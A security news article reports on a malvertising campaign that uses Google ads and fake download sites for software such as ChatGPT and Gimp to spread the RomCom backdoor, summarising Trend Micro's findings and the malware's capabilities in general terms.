That ChatGPT Google ad may be hiding some nasty malware

News
By published

Threat actor was spotted advertising fake software on Google Ads

Magnifying glass enlarging the word 'malware' in computer machine code
(Image credit: Shutterstock)

If you stumble upon a Google ad promoting a website where you could download well-known, or made-up software, be very careful, as it very well might just be a malvertising campaign.

RomCom is a backdoor malware that can do all sorts of nasties, from running cmd.exe, to dropping more malicious payloads on the target endpoint, from exfiltrating data from the compromised devices, to running AnyDEsk in a hidden window, from compressing and sending folders to hackers’-owned servers, to setting up a proxy via SSH.

Furthermore, RomCOm can gran screenshots from the compromised computer, steal cookies from popular browsers, steal cryptocurrency wallet data, chat messages, and login credentials and passwords.

Recently, cybersecurity researchers from Trend Micro discovered a new malvertising campaign pushing RomCom to unsuspecting victims. The threat actors created a number of fake websites for legitimate software such as Gimp, Go To Meeting, ChatGPT, WinDirSTrat, AstraChat, System Ninja, Devolutions’ Remote Desktop Manager, and others. 

Targets in Eastern Europe

Then, they would buy advertising space via Google’s ad network to promote the websites. Google ads aside, the attackers have also engaged in “highly targeted” phishing attacks, going for victims in Eastern Europe, it was said. 

Read more

> What is malware and how dangerous is it?

> Hackers are mailing out USB drives infected with ransomware

> These are the best endpoint security software around

While the websites offer various software for download, in reality the victims are getting MSI installers, trojanized with a malicious DLL file called InstallA.dll. This file drops three more DLLs into the target device, which communicate with the C2 server and receive further instructions. 

The researchers also explained how the attackers started using VMProtec software code, to protect from antivirus programs. They also use encryption for the payload. Furthermore, the software seems to be signed by legitimate companies allegedly based in northern America. However, these companies’ websites are “fulled with fake or plagiarized content”, BleepingComputer has found. 

RomCom’s goals vary from campaign to campaign, the publication further states, claiming that the group was seen engaging in both ransomware and espionage. 

“Whatever the case, it is a versatile threat that can cause significant damage,” the report concludes.

Via: BleepingComputer

TOPICS
Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Mac users targeted with new malware, so be on your guard
A padlock resting on a keyboard.
Understanding and avoiding malvertizing attacks
Representational image of a cybercriminal
Criminals are spreading malware disguised as DeepSeek AI
malware
Google warns of legit VPN apps being used to infect devices with malware
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Microsoft reveals over a million PCs hit by malvertising campaign
DeepSeek
Fake DeepSeek installers are infecting your device with dangerous malware
Latest in Security
Hacker silhouette working on a laptop with North Korean flag on the background
North Korea unveils new military unit targeting AI attacks
An image of network security icons for a network encircling a digital blue earth.
US government warns agencies to make sure their backups are safe from NAKIVO security issue
Laptop computer displaying logo of WordPress, a free and open-source content management system (CMS)
This top WordPress plugin could be hiding a worrying security flaw, so be on your guard
Computer Hacked, System Error, Virus, Cyber attack, Malware Concept. Danger Symbol
Veeam urges users to patch security issues which could allow backup hacks
UK Prime Minister Sir Kier Starmer
The UK releases timeline for migration to post-quantum cryptography
Representational image depecting cybersecurity protection
Cisco smart licensing system sees critical security flaws exploited
Latest in News
Ray-Ban Meta Smart Glasses
Samsung's rumored smart specs may be launching before the end of 2025
Apple iPhone 16 Review
The latest iPhone 18 leak hints at a major chipset upgrade for all four models
Quordle on a smartphone held in a hand
Quordle hints and answers for Monday, March 24 (game #1155)
NYT Strands homescreen on a mobile phone screen, on a light blue background
NYT Strands hints and answers for Monday, March 24 (game #386)
NYT Connections homescreen on a phone, on a purple background
NYT Connections hints and answers for Monday, March 24 (game #652)
Quordle on a smartphone held in a hand
Quordle hints and answers for Sunday, March 23 (game #1154)
More about security
Hacker silhouette working on a laptop with North Korean flag on the background

North Korea unveils new military unit targeting AI attacks

Laptop computer displaying logo of WordPress, a free and open-source content management system (CMS)

This top WordPress plugin could be hiding a worrying security flaw, so be on your guard
Compal Infinite Laptop

This laptop has a horizontal rollable display that extends to 18 inches, and I can't wait to try it
See more latest
Most Popular
Compal Infinite Laptop
This laptop has a horizontal rollable display that extends to 18 inches, and I can't wait to try it
Silicon Motion MonTian 128TB SSD
More 128TB SSDs on the way, but they won't be cheaper: Key maker of NAND flash controllers says 128TB SSDs are shipping
Toshiba HDD Innovation Lab
How to make hard drives faster? Simple, just bunch dozens of them together, Toshiba says
Asus Ascent GX10
Asus debuts its own mini AI supercomputer: Ascent GX10 costs $2999 and comes with Nvidia's GB10 Grace Blackwell Superchip
Ray-Ban Meta Smart Glasses
Samsung's rumored smart specs may be launching before the end of 2025
Quordle on a smartphone held in a hand
Quordle hints and answers for Monday, March 24 (game #1155)
NYT Connections homescreen on a phone, on a purple background
NYT Connections hints and answers for Monday, March 24 (game #652)
NYT Strands homescreen on a mobile phone screen, on a light blue background
NYT Strands hints and answers for Monday, March 24 (game #386)
Apple iPhone 16 Review
The latest iPhone 18 leak hints at a major chipset upgrade for all four models
Micron SOCAMM memory module
World's biggest RAM vendors develop superior memory form factor exclusively for Nvidia, sorry Intel and AMD